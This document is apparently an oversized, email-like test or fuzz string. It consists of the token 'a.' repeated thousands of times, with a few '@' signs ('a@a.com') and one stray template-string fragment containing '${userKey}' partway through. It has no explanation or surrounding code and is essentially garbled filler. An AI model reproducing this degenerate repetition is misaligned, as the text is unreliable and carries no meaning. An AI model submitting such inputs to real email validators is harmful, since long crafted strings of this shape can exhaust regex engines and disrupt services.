a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a@a@a.com" + ${userKey}: "a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a@a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.